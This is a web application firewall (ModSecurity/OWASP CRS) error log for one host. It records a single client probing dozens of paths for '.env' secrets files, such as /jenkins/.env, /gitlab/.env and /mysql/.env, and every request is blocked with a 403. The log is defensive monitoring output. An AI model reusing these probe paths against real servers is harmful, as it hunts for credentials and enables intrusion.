[Mon May 11 15:50:21.090678 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /cd/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/cd/.env"] [unique_id "agHenat2WtvoFr7xvGzdEgAAAIk"]
[Mon May 11 15:50:21.091189 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/cd/.env"] [unique_id "agHenat2WtvoFr7xvGzdEgAAAIk"]
[Mon May 11 15:50:21.091438 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/cd/.env"] [unique_id "agHenat2WtvoFr7xvGzdEgAAAIk"]
[Mon May 11 15:50:21.188175 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /jenkins/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/jenkins/.env"] [unique_id "agHenat2WtvoFr7xvGzdEwAAAIk"]
[Mon May 11 15:50:21.188665 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/jenkins/.env"] [unique_id "agHenat2WtvoFr7xvGzdEwAAAIk"]
[Mon May 11 15:50:21.188888 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/jenkins/.env"] [unique_id "agHenat2WtvoFr7xvGzdEwAAAIk"]
[Mon May 11 15:50:21.280686 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /gitlab/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/gitlab/.env"] [unique_id "agHenat2WtvoFr7xvGzdFAAAAIk"]
[Mon May 11 15:50:21.281069 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/gitlab/.env"] [unique_id "agHenat2WtvoFr7xvGzdFAAAAIk"]
[Mon May 11 15:50:21.281279 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/gitlab/.env"] [unique_id "agHenat2WtvoFr7xvGzdFAAAAIk"]
[Mon May 11 15:50:21.373915 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /github/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/github/.env"] [unique_id "agHenat2WtvoFr7xvGzdFQAAAIk"]
[Mon May 11 15:50:21.374369 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/github/.env"] [unique_id "agHenat2WtvoFr7xvGzdFQAAAIk"]
[Mon May 11 15:50:21.374582 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/github/.env"] [unique_id "agHenat2WtvoFr7xvGzdFQAAAIk"]
[Mon May 11 15:50:21.466824 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /actions/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/actions/.env"] [unique_id "agHenat2WtvoFr7xvGzdFgAAAIk"]
[Mon May 11 15:50:21.467288 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/actions/.env"] [unique_id "agHenat2WtvoFr7xvGzdFgAAAIk"]
[Mon May 11 15:50:21.467501 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/actions/.env"] [unique_id "agHenat2WtvoFr7xvGzdFgAAAIk"]
[Mon May 11 15:50:21.559612 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /circleci/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/circleci/.env"] [unique_id "agHenat2WtvoFr7xvGzdFwAAAIk"]
[Mon May 11 15:50:21.560086 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/circleci/.env"] [unique_id "agHenat2WtvoFr7xvGzdFwAAAIk"]
[Mon May 11 15:50:21.560310 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/circleci/.env"] [unique_id "agHenat2WtvoFr7xvGzdFwAAAIk"]
[Mon May 11 15:50:21.652214 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /travis/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/travis/.env"] [unique_id "agHenat2WtvoFr7xvGzdGQAAAIk"]
[Mon May 11 15:50:21.652688 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/travis/.env"] [unique_id "agHenat2WtvoFr7xvGzdGQAAAIk"]
[Mon May 11 15:50:21.652906 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/travis/.env"] [unique_id "agHenat2WtvoFr7xvGzdGQAAAIk"]
[Mon May 11 15:50:21.745228 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /buildkite/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/buildkite/.env"] [unique_id "agHenat2WtvoFr7xvGzdGgAAAIk"]
[Mon May 11 15:50:21.745717 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/buildkite/.env"] [unique_id "agHenat2WtvoFr7xvGzdGgAAAIk"]
[Mon May 11 15:50:21.745940 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/buildkite/.env"] [unique_id "agHenat2WtvoFr7xvGzdGgAAAIk"]
[Mon May 11 15:50:21.838457 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /mysql/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/mysql/.env"] [unique_id "agHenat2WtvoFr7xvGzdGwAAAIk"]
[Mon May 11 15:50:21.838943 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/mysql/.env"] [unique_id "agHenat2WtvoFr7xvGzdGwAAAIk"]
[Mon May 11 15:50:21.839213 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/mysql/.env"] [unique_id "agHenat2WtvoFr7xvGzdGwAAAIk"]
[Mon May 11 15:50:21.932089 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /postgres/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/postgres/.env"] [unique_id "agHenat2WtvoFr7xvGzdHAAAAIk"]
[Mon May 11 15:50:21.932599 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/postgres/.env"] [unique_id "agHenat2WtvoFr7xvGzdHAAAAIk"]
[Mon May 11 15:50:21.932824 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/postgres/.env"] [unique_id "agHenat2WtvoFr7xvGzdHAAAAIk"]
[Mon May 11 15:50:22.027660 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /mongodb/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/mongodb/.env"] [unique_id "agHenqt2WtvoFr7xvGzdIAAAAIk"]
[Mon May 11 15:50:22.028199 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/mongodb/.env"] [unique_id "agHenqt2WtvoFr7xvGzdIAAAAIk"]
[Mon May 11 15:50:22.028450 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/mongodb/.env"] [unique_id "agHenqt2WtvoFr7xvGzdIAAAAIk"]
[Mon May 11 15:50:22.122771 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /redis/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/redis/.env"] [unique_id "agHenqt2WtvoFr7xvGzdIQAAAIk"]
[Mon May 11 15:50:22.123284 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/redis/.env"] [unique_id "agHenqt2WtvoFr7xvGzdIQAAAIk"]
[Mon May 11 15:50:22.123512 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/redis/.env"] [unique_id "agHenqt2WtvoFr7xvGzdIQAAAIk"]
[Mon May 11 15:50:22.215474 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /elasticsearch/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/elasticsearch/.env"] [unique_id "agHenqt2WtvoFr7xvGzdIgAAAIk"]
[Mon May 11 15:50:22.215952 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/elasticsearch/.env"] [unique_id "agHenqt2WtvoFr7xvGzdIgAAAIk"]
[Mon May 11 15:50:22.216188 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/elasticsearch/.env"] [unique_id "agHenqt2WtvoFr7xvGzdIgAAAIk"]
